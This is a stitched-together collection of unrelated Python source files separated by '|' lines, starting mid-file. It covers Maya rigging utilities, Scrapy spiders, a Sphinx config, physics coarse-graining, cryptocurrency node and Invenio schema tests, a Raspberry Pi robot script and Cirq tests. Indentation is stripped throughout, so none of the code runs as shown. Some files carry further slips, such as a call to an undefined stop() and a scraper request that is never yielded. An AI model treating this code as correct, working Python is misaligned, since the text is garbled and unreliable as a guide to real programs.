cmds.scrollField( editable = False, text = code.replace( ' ', '' ) )
cmds.showWindow()
'''
========================================================================
----> About No Flip Pole Vector <----
========================================================================
'''
def about( self, *args ):
about = '''
"""
========================================================================
----> No Flip Pole Vector <----
========================================================================
"""
This tool builds a no flip pole vector. After passing in a root joint,
main controller, and pole vector the tool will allow the pole vector to
follow the main controller or switch to world space.
If you have any questions email me at Nicholas.Silveira@gmail.com
'''
if cmds.window( 'about_window', exists = True, q = True ):
cmds.deleteUI( 'about_window' )
cmds.window( 'about_window', title = 'About' )
cmds.paneLayout()
cmds.scrollField( editable = False, text = about.replace( ' ', '' ) )
cmds.showWindow()
'''
========================================================================
----> Maya Utilities <----
========================================================================
'''
class Maya_Util():
'''
========================================================================
----> Create a Maya reverse node <----
========================================================================
'''
def reverse_node ( self, parent_attr, child_attr, node_name = '' ):
"""
*Arguments:*
* ``parent_attr`` Pass the parent attribute.
* ``child_attr`` Pass the child attribute.
*Keyword Arguments:*
* ``node_name`` Pass a node name.
*Returns:*
* ``node`` Returns reverse node
"""
node = cmds.shadingNode( 'reverse', name = node_name, asUtility = True )
cmds.connectAttr( parent_attr, '{0}.inputX'.format( node ) )
cmds.connectAttr( '{0}.outputX'.format( node ), child_attr )
'''
========================================================================
----> DAG Node Utilities <----
========================================================================
'''
class DAG_Node():
"""
*Arguments:*
* ``node`` Makes a DAG instance from passed node
*Examples:* ::
import maya.cmds as cmds
import no_flip_pole_vector_tool as nfpv
exampleA_grp = nfpv.DAG_Node( cmds.group( n = 'exampleA_grp', em = True ) )
exampleB_grp = nfpv.DAG_Node( cmds.group( n = 'exampleB_grp', em = True ) )
exampleA_grp.set_parent(exampleB_grp)
print exampleA_grp.parent()
print exampleA_grp.name()
"""
def __init__( self, node ):
selection_list = OpenMaya.MSelectionList()
selection_list.add( node )
self.m_obj = OpenMaya.MObject()
selection_list.getDependNode( 0, self.m_obj )
'''
========================================================================
----> DAG Full Path Name <----
========================================================================
'''
def name( self ):
"""
*Returns:*
* ``node_name`` Returns DAG's full path name.
"""
nodeFn = OpenMaya.MFnDagNode( self.m_obj )
node_name = nodeFn.fullPathName()
return node_name
'''
========================================================================
----> DAG Parent <----
========================================================================
'''
def parent( self ):
"""
*Returns:*
* ``node_parent`` Returns DAG's parent or None.
"""
node_parent = cmds.listRelatives( self.name(), parent = True, f = True )
if node_parent:
return DAG_Node( node_parent[0] )
else:
return None
'''
========================================================================
----> Set DAG Parent <----
========================================================================
'''
def set_parent( self, parent ):
cmds.parent( self.name(), parent.name() )
|
#!/usr/bin/env python
"""
SINGLETON
Use the Singleton pattern when:
1. there must be exactly one instance of a class, and it must be
accessible to clients from a well-known access point.
2. the sole instance should be extensible by subclassing, and clients
should be able to use an extended instance without modifying their code.
"""
import logging
class Connection(object):
"""
Singleton
1. Defines an Instance operation that lets clients access its unique
instance.
2. May be responsible for creating its own unique instance.
"""
def __new__(type):
if not '_connection' in type.__dict__:
type._connection = object.__new__(type)
logging.basicConfig(level=logging.INFO)
logging.info('New database connection created!')
logging.info('Connection established.')
return type._connection
if __name__ == "__main__":
c = Connection()
d = Connection()
|
import socket
from http import HTTPStatus
from urllib.request import Request, urlopen, ProxyHandler, build_opener
from urllib.parse import urlencode, unquote_plus, quote, quote_plus
from urllib.error import HTTPError, URLError
class ClientBase:
def __init__(self, nacos_host: str, api_level: str = 'v1'):
self.host = nacos_host
self.level = api_level
self.base_url = f'{nacos_host}/nacos/{api_level}'
def handle(self, url: str, headers: dict = {}, params: dict = {}, data: dict = {}, method: str = 'GET'):
def _get_params_str():
params_list = []
for key in params.keys():
value = params.get(key, None)
if value is not None:
if not isinstance(value, str):
value = str(value)
params_list.append(f'{key}={quote_plus(value)}')
return '&'.join(params_list)
try:
url += '?' + _get_params_str()
req = Request(self.base_url + url, headers=headers, data=urlencode(data).encode(), method=method)
resp = urlopen(req)
response = resp.read()
resp.close()
return response
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise Exception("Insufficient privilege.")
else:
raise Exception(e)
except socket.timeout:
raise Exception(f"{self.host} request timeout")
except URLError as e:
raise Exception(f"{self.host} connection error:{e.reason}")
|
import logging
from django.contrib.auth.models import User
from unplugged import RelatedPluginField, Schema, fields
from wampyre.realm import realm_manager
from ...plugins import NotifierPlugin
logger = logging.getLogger(__name__)
class MultiNotifierSchema(Schema):
notifiers = fields.List(
RelatedPluginField(plugin_type=NotifierPlugin), many=True, default=list
)
class MultiNotifierNotifierHandlerPlugin(NotifierPlugin):
plugin_name = "multinotifier"
config_schema = MultiNotifierSchema
def notify(self, notification):
for notifier in self.config.get("notifiers", []):
notifier.notify(notification)
|
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2021-05-20 16:25
from typing import Union, List, Callable
from elit.common.dataset import TransformableDataset
from elit.utils.io_util import read_cells
STS_B_TRAIN = 'http://ixa2.si.ehu.es/stswiki/images/4/48/Stsbenchmark.tar.gz#sts-train.csv'
STS_B_DEV = 'http://ixa2.si.ehu.es/stswiki/images/4/48/Stsbenchmark.tar.gz#sts-dev.csv'
STS_B_TEST = 'http://ixa2.si.ehu.es/stswiki/images/4/48/Stsbenchmark.tar.gz#sts-test.csv'
class SemanticTextualSimilarityDataset(TransformableDataset):
def __init__(self,
data: Union[str, List],
sent_a_col,
sent_b_col,
similarity_col,
delimiter='auto',
transform: Union[Callable, List] = None,
cache=None,
generate_idx=None) -> None:
self.delimiter = delimiter
self.similarity_col = similarity_col
self.sent_b_col = sent_b_col
self.sent_a_col = sent_a_col
super().__init__(data, transform, cache, generate_idx)
def load_file(self, filepath: str):
for i, cells in enumerate(read_cells(filepath, strip=True, delimiter=self.delimiter)):
yield {
'sent_a': cells[self.sent_a_col],
'sent_b': cells[self.sent_b_col],
'similarity': float(cells[self.similarity_col])
}
|
from typing import *
import re
class Censorship:
def __init__(self, content: Union[Any, str, None] = None) -> None:
self.content: str = content
def update_content(self, content: Any):
self.content = content
def censor(self):
censored = ["fuck", "shit", "lmao", "lmfao", "porn", "sex", "cock", "ball"]
for censor in censored:
if censor in self.content:
lenned = len(censor)
hashes = "#" * lenned
self.content = self.content.replace(censor, hashes)
self.content = re.sub(
"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*(),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+",
"[url omitted]",
self.content,
)
return self.content
|
"""Scraper for the 1st District Court of Appeals
CourtID: ohio
Court Short Name: Ohio
Author: Andrei Chelaru
"""
from juriscraper.opinions.united_states.state import ohio
class Site(ohio.Site):
def __init__(self):
super(Site, self).__init__()
self.court_id = self.__module__
self.court_index = 2
self.url = self.make_url(self.court_index, self.year)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tflib.checkpoint import *
from tflib.ops import *
from tflib.utils import *
from tflib.variable import *
|
# -*- coding: utf-8 -*-
from discord.ext import commands
import discord
client = commands.Bot(command_prefix='.')
|
import os
import csv
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, FormRequest
from product_spiders.fuzzywuzzy import process
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class SellUsYourGadgetSpider(BaseSpider):
name = 'sellusyourgadget.co.uk'
allowed_domains = ['sellusyourgadget.co.uk']
start_urls = ['http://sellusyourgadget.co.uk/index.php/home/myProduct']
def __init__(self, *args, **kwargs):
super(SellUsYourGadgetSpider, self).__init__(*args, **kwargs)
csv_file = csv.reader(open(os.path.join(HERE, 'sellusyourgadget_products.csv')))
self.products =[row[0] for row in csv_file]
def parse(self, response):
hxs = HtmlXPathSelector(response)
product_ids = hxs.select('//*[@id="product"]/option/@value').extract()
for id in product_ids:
url = 'http://sellusyourgadget.co.uk/index.php/home/getSubProducts/%s'
yield Request(url % id, callback=self.parse_subproducts, meta={'id': id})
def parse_subproducts(self, response):
hxs = HtmlXPathSelector(response)
#Fix for the HTML code.
html = hxs.extract().replace('<br></h3>','').\
replace('<h3','<div class="item"').\
replace('</p>\n <div','</p></div>\n <div').\
replace('<input type="radio"', '<div class="hd" ').\
replace('checked>','>').\
replace('</p></div>','</div></p></div>').\
replace('</p>\n', '</div></p>\n')
products_hxs = HtmlXPathSelector(text=html)
products = products_hxs.select('//div[@class="item"]')
for product in products:
sub_products = product.select('div[@class="hd"]')
if sub_products:
for sub_product in sub_products:
value = sub_product.select('./@value').extract()[0]
hd = sub_product.select('./text()').extract()[0]
name = ' '.join((product.select('p/text()').extract()[0], hd))
extracted = process.extractOne(name, self.products)
try:
if extracted[1]>=98:
url = 'http://sellusyourgadget.co.uk/index.php/home/getConditions/%s'
yield Request(url % value.split(':')[0], callback=self.parse_options,
meta={'id':response.meta['id'],
'name': name,
'memoryR':value,
'memory':value})
except TypeError:
return
else:
name = product.select('p/text()').extract()[0]
extracted = process.extractOne(name, self.products)
try:
if extracted[1]>=98:
value = product.select('p/input/@value').extract()[0]
url = 'http://sellusyourgadget.co.uk/index.php/home/getConditions/%s'
yield Request(url % value.split(':')[0], callback=self.parse_options,
meta={'id':response.meta['id'],
'name':name,
'memoryR':value,
'memory':value})
except TypeError:
return
def parse_options(self, response):
'''Gets the percentages to be subtracted to the initial price.
'''
try:
hxs = HtmlXPathSelector(response)
percentages = hxs.select('//input[@name="conditionR"]/@value').extract()
grade_values = dict(zip(['Grade A','Grade B', 'Grade C',
'Grade D', 'Grade E'], percentages))
for grade, percentage in grade_values.iteritems():
yield FormRequest('http://sellusyourgadget.co.uk/index.php/home/getQuote',
method='POST',
formdata={'product':response.meta['id'],
'memoryR':response.meta['memoryR'],
'conditionR':percentage,
'condition':percentage,
'memory':response.meta['memory'],
'tick1':'0',
'tick2':'0',
'tick3':'0',
'tick4':'0',
'price':''},
callback=self.parse_product,
meta={'name': ' '.join((response.meta['name'], grade))})
except TypeError:
return
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
loader = ProductLoader(item=Product(), response=response)
loader.add_value('name', response.meta['name'])
loader.add_xpath('price', '//*[@id="price-text"]/span/text()')
yield loader.load_item()
|
#!/usr/bin/env python
"""
_LoadForMonitoring_
MySQL implementation for loading a job by scheduler status
"""
from WMCore.Database.DBFormatter import DBFormatter
class LoadForMonitoring(DBFormatter):
"""
_LoadForMonitoring_
Load all jobs with a certain scheduler status including
all the joined information.
"""
sql = """SELECT rj.wmbs_id AS jobid, rj.grid_id AS gridid, rj.bulk_id AS bulkid,
st.name AS status, rj.retry_count as retry_count, rj.id AS id,
rj.status_time as status_time, wl.plugin AS plugin, wu.cert_dn AS owner
FROM bl_runjob rj
INNER JOIN bl_status st ON rj.sched_status = st.id
LEFT OUTER JOIN wmbs_users wu ON wu.id = rj.user_id
INNER JOIN wmbs_job wj ON wj.id = rj.wmbs_id
LEFT OUTER JOIN wmbs_location wl ON wl.id = wj.location
WHERE rj.status = :complete
"""
def execute(self, complete = '1', conn = None, transaction = False):
"""
_execute_
Load all jobs either running or not (running by default)
"""
binds = {'complete': complete}
result = self.dbi.processData(self.sql, binds, conn = conn,
transaction = transaction)
return self.formatDict(result)
|
# -*- coding: utf-8 -*-
from scrapy import Spider, Request
from ..items import Article
from ..items import Lien
class MyScraper(Spider):
name = u'myscraper'
def start_requests(self):
urlToVisit = {}
Request(
url='http://www.google.fr/',
callback=self.parse,
)
def parse(self, response):
for i in response:
yield i
|
# documentation build configuration file, created by
# sphinx-quickstart on Thu Jul 23 19:40:08 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os, subprocess
import shlex
import recommonmark
import sphinx_gallery
from recommonmark.parser import CommonMarkParser
from recommonmark.transform import AutoStructify
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '..'))
# -- General configuration ------------------------------------------------
# Version information.
import gluonnlp as nlp
version = nlp.__version__
release = nlp.__version__
# General information about the project.
project = 'gluonnlp'
author = '%s developers' % project
copyright = '2019, %s' % author
github_doc_root = 'http://gluon-nlp.mxnet.io/{}/'.format(str(version))
# add markdown parser
CommonMarkParser.github_doc_root = github_doc_root
extensions = ['recommonmark']
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'sphinx_autodoc_typehints',
'sphinx.ext.mathjax',
'sphinx_gallery.gen_gallery',
'nbsphinx',
'IPython.sphinxext.ipython_console_highlighting',
'IPython.sphinxext.ipython_directive',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
nbsphinx_kernel_name = 'python3'
nbsphinx_allow_errors = True
nbsphinx_timeout = 1200
nbsphinx_execute = 'never'
html_sourcelink_suffix = ''
html_context = {
'display_github': True,
'github_user': 'dmlc',
'github_repo': 'gluon-nlp',
'github_version': 'master',
'conf_py_path': '/docs/',
'last_updated': False,
'commit': True
}
nbsphinx_prolog = """
{% set paths = env.docname.split('/') %}
.. only:: html
:download:`Download this tutorial <{{ "../%s.zip"|format(paths[1]) }}>`
"""
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = ['.rst', '.ipynb', '.md']
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# generate autosummary even if no references
autosummary_generate = True
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/gluon-logo.svg'
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/gluon.ico'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', '**.ipynb_checkpoints', 'examples/*/*/**.rst', 'model_zoo/*/*/**.rst',
'model_zoo/word_embeddings/tools/extern/*/**.md']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme is set by the make target
# html_theme = os.environ.get('GLUONNLP_THEME', 'rtd')
# on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# only import rtd theme and set it if want to build docs locally
# if not on_rtd and html_theme == 'rtd':
# import sphinx_rtd_theme
# html_theme = 'sphinx_rtd_theme'
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_theme = 'mxtheme'
html_theme_path = ['mxtheme']
html_theme_options = {
'primary_color': 'blue',
'accent_color': 'deep_orange',
'header_links' : [
('Install', 'install/install-more', False, ''),
('API', 'api/index', False, ''),
('Community', 'website/index', False, ''),
('Contribute', 'website/contribute', False, ''),
('GitHub', 'https://github.com/dmlc/gluon-nlp/', True, 'fab fa-github'),
],
# custom layout
'fixed_drawer' : True,
'fixed_header' : True,
'header_waterfall' : True,
'header_scroll': True,
# Render footer (Default: True)
'show_footer': False
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = project + 'doc'
# -- Options for LaTeX output ---------------------------------------------
# latex_elements = {
# }
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
# latex_documents = [
# (master_doc, '%s.tex' % project, project,
# author, 'manual'),
# ]
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(sys.version_info), None),
'mxnet': ('https://mxnet.apache.org/api/python/docs/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None),
'scipy': ('http://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('http://matplotlib.org/', None),
'nltk': ('http://www.nltk.org/', None),
}
from sphinx_gallery.sorting import ExplicitOrder
# examples_dirs = []
# gallery_dirs = []
# subsection_order = ExplicitOrder([])
def setup(app):
import mxtheme
app.add_directive('card', mxtheme.CardDirective)
app.add_config_value('recommonmark_config', {
'url_resolver': lambda url: github_doc_root + url,
'auto_doc_ref': True
}, True)
app.add_transform(AutoStructify)
app.add_javascript('google_analytics.js')
app.add_javascript('hidebib.js')
app.add_javascript('install-options.js')
app.add_stylesheet('custom.css')
sphinx_gallery_conf = {
'backreferences_dir': 'gen_modules/backreferences',
'doc_module': ('gluonnlp', 'mxnet', 'numpy'),
'reference_url': {
'gluonnlp': None,
'numpy': 'http://docs.scipy.org/doc/numpy-1.9.1'},
'examples_dirs': [],
'gallery_dirs': [],
'subsection_order': ExplicitOrder([]),
'find_mayavi_figures': False,
'filename_pattern': '.py',
'expected_failing_examples': []
}
# Napoleon settings
napoleon_use_ivar = True
napoleon_use_param = True # Required for compatibility with sphinx-autodoc-typehints
# linkcheck settings
import multiprocessing
linkcheck_ignore = [r'http[s]://apache-mxnet.s3*']
linkcheck_retries = 3
linkcheck_workers = int(multiprocessing.cpu_count() / 2)
|
"""
Module coarse_graining implements a Gaussian coarse-graining adapted from
Illing et al., Phys. Rev. Lett. 117, 208002 (2016) following Goldhirsch and
Goldenberg, Eur. Phys. J. E 9, 245β251 (2002).
"""
import numpy as np
class GaussianCG:
"""
Gaussian coarse-graining.
"""
def __init__(self, sigma, r_cut):
"""
Parameters
----------
sigma : float
Length scale of Gaussian function.
r_cut : float
Coarse-graining cut-off radius.
"""
self.sigma = sigma # length scale of Gaussian function
self.r_cut = r_cut # coarse-graining cut-off radius
def function(self, r):
"""
Parameters
----------
r : float
Radius.
Returns
-------
phi : float
Coarse-graining factor at radius r.
"""
if r > self.r_cut: return 0 # coarse-graining function is zero after cut-off
Dg = 2*np.pi*(self.sigma**2)*(1 -
np.exp(-0.5*((self.r_cut/self.sigma)**2))) # normalisation factor
return np.exp(-0.5*((r/self.sigma)**2))/Dg # coarse-graining factor
def factors(self, positions):
"""
Parameters
----------
positions : float array
Coordinates at which coarse-graining is desired.
Returns
-------
CGfactors : Numpy float array
Coarse-graining factors at positions.
"""
return np.array(list(map(
lambda r: self.function(r),
np.sqrt(np.sum(positions**2, axis=-1))
))) # coarse graining factors at positions
class SquareUniformCG:
"""
Square uniform coarse-graining.
"""
def __init__(self, dL):
"""
Parameters
----------
dL : float
Length of square box on which to average.
"""
self.dL = dL # averaging square length
def function(self, position):
"""
Parameters
----------
position : float array
Coordinates.
Returns
-------
phi : float
Coarse-graining factor at position position.
"""
if (np.abs(np.array(position)) > self.dL/2).any(): return 0 # coarse-graining function is zero outside square
return 1 # is one in
def factors(self, positions):
"""
Parameters
----------
positions : float array
Coordinates at which coarse-graining is desired.
Returns
-------
CGfactors : Numpy float array
Coarse-graining factors at positions.
"""
CGfactors = np.array(list(map(
lambda position:
self.function(position),
positions
)))
sumCGfactors = np.sum(CGfactors)
if np.sum(CGfactors) == 0: return 0
return CGfactors/sumCGfactors # coarse graining factors at positions
class CoarseGraining:
"""
Enables unique calculation of coarse-graining factors and then calculation
of coarse-graining avergages.
"""
def __init__(self, factors_function, positions):
"""
Parameters
----------
factors_function : function
Function of array of coordinates which returns coarse-graining
factors at these coordinates.
positions : float array
Coordinates at which coarse-graining is desired.
"""
self.CGfactors = np.array(factors_function(positions)) # coarse-graining factors at positions
def average(self, var):
"""
Coarse-graining averaging.
Parameters
----------
var : float array
Values of variable to coarse-grain at different positions from
point at which coarse-graining is desired.
Returns
-------
average : float
Coarse-grained variable.
"""
return np.sum(
np.transpose(np.array(self.CGfactors,
ndmin=len(np.array(var).shape)))
*np.array(var), axis=0) # coarse-grained variable
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The dogxcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uacomment option."""
import re
from test_framework.test_framework import dogxcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import assert_equal
class UacommentTest(dogxcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test multiple -uacomment")
test_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-12:-1]
assert_equal(test_uacomment, "(testnode0)")
self.restart_node(0, ["-uacomment=foo"])
foo_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-17:-1]
assert_equal(foo_uacomment, "(testnode0; foo)")
self.log.info("test -uacomment max length")
self.stop_node(0)
expected = "Error: Total length of network version string \([0-9]+\) exceeds maximum length \(256\). Reduce the number or size of uacomments."
self.nodes[0].assert_start_raises_init_error(["-uacomment=" + 'a' * 256], expected, match=ErrorMatch.FULL_REGEX)
self.log.info("test -uacomment unsafe characters")
for unsafe_char in ['/', ':', '(', ')', 'βΏ', 'π']:
expected = "Error: User Agent comment \(" + re.escape(unsafe_char) + "\) contains unsafe characters."
self.nodes[0].assert_start_raises_init_error(["-uacomment=" + unsafe_char], expected, match=ErrorMatch.FULL_REGEX)
if __name__ == '__main__':
UacommentTest().main()
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020-2021 CERN.
# Copyright (C) 2020-2021 Northwestern University.
# Copyright (C) 2021 TU Wien.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Test metadata access schema."""
import pytest
from marshmallow.exceptions import ValidationError
from invenio_rdm_records.services.schemas.access import AccessSchema, \
EmbargoSchema
def test_embargo_load_no_until_is_valid():
expected = {
"active": False,
"until": None,
"reason": None
}
valid_no_until = {
"active": False,
}
assert expected == EmbargoSchema().load(valid_no_until)
valid_no_until = {
"active": False,
"until": None,
}
assert expected == EmbargoSchema().load(valid_no_until)
def test_embargo_dump_no_until_is_valid():
valid_no_until = {
"active": False,
}
assert valid_no_until == EmbargoSchema().dump(valid_no_until)
expected = {
"active": False,
}
valid_no_until = {
"active": False,
"until": None,
}
assert expected == EmbargoSchema().dump(valid_no_until)
def test_valid_full():
valid_full = {
"record": "public",
"files": "restricted",
"embargo": {
"active": True,
"until": "2120-10-06",
"reason": "espionage"
},
}
assert valid_full == AccessSchema().load(valid_full)
@pytest.mark.parametrize("invalid_access,invalid_attr", [
({"files": "restricted",
"embargo": {"active": True, "until": "2131-01-01", "reason": "secret!"}},
"record"),
({"record": "public",
"embargo": {"active": True, "until": "2131-01-01", "reason": "secret!"}},
"files"),
({"record": "public", "files": "restricted",
"embargo": {"active": False, "until": "2131-01-01", "reason": "secret!"}},
"embargo"),
({"record": "public", "files": "restricted",
"embargo": {"active": True, "until": "1999-01-01", "reason": "secret!"}},
"embargo"),
({"record": "invalid", "files": "restricted",
"embargo": {"active": False, "until": "1999-01-01", "reason": "secret!"}},
"record"),
({"record": "public", "files": "invalid",
"embargo": {"active": False, "until": "1999-01-01", "reason": "secret!"}},
"files"),
])
def test_invalid(invalid_access, invalid_attr):
with pytest.raises(ValidationError) as e:
AccessSchema().load(invalid_access)
error_fields = e.value.messages.keys()
assert len(error_fields) == 1
assert invalid_attr in error_fields
|
#coding: utf-8
import subprocess, string, ast
def get(host):
file = open("%s.txt"%host, "r+")
macs = file.read()
macs = ast.literal_eval(macs)
return macs
def set(host):
macs = []
command1 = "ssh user@%s 'ls /sys/class/net'" %host
try:
list_intefaces = subprocess.check_output(command1, shell=True)
list_intefaces = string.split(list_intefaces)
for interface in list_intefaces:
command = "ssh user@%s 'cat /sys/class/net/%s/address'" %(host, interface) # command to return mac address
mac = subprocess.check_output(command, shell=True) # Receives the output of the above command
macs.append(mac.rstrip())
except subprocess.CalledProcessError:
print 'NΓ£o foi possΓvel obter o MAC de %s'%host
file = open("%s.txt"%host, "w+")
file.write(str(macs))
file.close()
print '%s %s'%(host, macs)
|
from expression import *
# programming the GPIO by BCM pin numbers
#TRIG = servo['Sensor']['ultrasonic']['trigger']
#ECHO = servo['Sensor']['ultrasonic']['echo']
TRIG = 24
ECHO = 23
GPIO.setup(TRIG,GPIO.OUT) # initialize GPIO Pin as outputs
GPIO.setup(ECHO,GPIO.IN) # initialize GPIO Pin as input
def forward():
Run(1,0,1,0,80)
def back():
Run(0,1,0,1,80)
def left():
Run(0,1,1,0,80)
def right():
Run(1,0,0,1,80)
Stop()
count=0
def Distance():
avgDistance=0
for i in range(2):
GPIO.output(TRIG, False) #Set TRIG as LOW
time.sleep(0.1) #Delay
GPIO.output(TRIG, True) #Set TRIG as HIGH
time.sleep(0.00001) #Delay of 0.00001 seconds
GPIO.output(TRIG, False) #Set TRIG as LOW
off=1
while GPIO.input(ECHO)==0: #Check whether the ECHO is LOW
pass
pulse_start = time.time()
off=0
while GPIO.input(ECHO)==1: #Check whether the ECHO is HIGH
pass
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start #time to get back the pulse to sensor
distance = pulse_duration * 17150 #Multiply pulse duration by 17150 (34300/2) to get distance
distance = round(distance,2) #Round to two decimal points
avgDistance=avgDistance+distance
return avgDistance
while True:
i=0
avgDistance=Distance()/5
time.sleep(1)
flag=0
if avgDistance < 100:
count += 1 #Check whether the distance is within 15 cm range
Stop()
time.sleep(2)
changeDegreeGpio([0],[0],5,0.05)
dist = Distance()/5
print("right dist ",dist)
time.sleep(8)
if dist>=5:
right()
continue
changeDegreeGpio([0],[180],5,0.05)
dist = Distance()/5
print("left dist ",dist)
time.sleep(8)
if dist>=5:
left()
continue
changeDegreeGpio([0],[90],5,0.05)
time.sleep(1)
back()
time.sleep(1.5)
if (count%3 ==1) & (flag==0):
right()
flag=1
else:
left()
flag=0
time.sleep(1.5)
stop()
time.sleep(1)
else:
print("go forward")
flag=0
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand
from django.contrib.sites.models import Site
from allauth.socialaccount.models import SocialApp
from tamusers.providers.tampere.provider import TampereProvider
class Command(BaseCommand):
help = 'Create or update tamusers allauth SocialApp'
def handle(self, *args, **options):
changed = False
try:
app = SocialApp.objects.get(provider=TampereProvider.id)
except SocialApp.DoesNotExist:
app = SocialApp(provider=TampereProvider.id)
self.stdout.write(self.style.SUCCESS('Creating new SocialApp'))
if not app.name:
app.name = 'Tampereen kaupungin tyΓΆntekijΓ€t'
changed = True
client_id = secret_key = None
jwt_settings = getattr(settings, 'JWT_AUTH')
if jwt_settings:
client_id = jwt_settings.get('JWT_AUDIENCE')
secret_key = jwt_settings.get('JWT_SECRET_KEY')
if not client_id:
raise ImproperlyConfigured("You must set JWT_AUTH['JWT_AUDIENCE'] to correspond to your client ID")
if not secret_key:
raise ImproperlyConfigured("You must set JWT_AUTH['JWT_SECRET_KEY'] to correspond to your secret key")
if app.client_id != client_id:
changed = True
app.client_id = client_id
if app.secret != secret_key:
changed = True
app.secret = secret_key
if changed:
app.save()
if not app.sites.exists():
app.sites.add(Site.objects.get(id=settings.SITE_ID))
changed = True
if changed:
self.stdout.write(self.style.SUCCESS('SocialApp successfully updated'))
else:
self.stdout.write(self.style.NOTICE('Already synced -- no changes needed'))
|
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import dataclasses
import datetime
import time
import numpy as np
import pytest
import cirq
import cirq.work as cw
from cirq.work.observable_measurement_data import (
_check_and_get_real_coef,
_obs_vals_from_measurements,
_stats_from_measurements,
)
from cirq.work.observable_settings import _MeasurementSpec
def test_get_real_coef():
q0 = cirq.LineQubit(0)
assert _check_and_get_real_coef(cirq.Z(q0) * 2, atol=1e-8) == 2
assert _check_and_get_real_coef(cirq.Z(q0) * complex(2.0), atol=1e-8) == 2
with pytest.raises(ValueError):
_check_and_get_real_coef(cirq.Z(q0) * 2.0j, atol=1e-8)
def test_obs_vals_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
vals = _obs_vals_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
should_be = [10, -10, -10, 10]
np.testing.assert_equal(vals, should_be)
def test_stats_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
mean, err = _stats_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
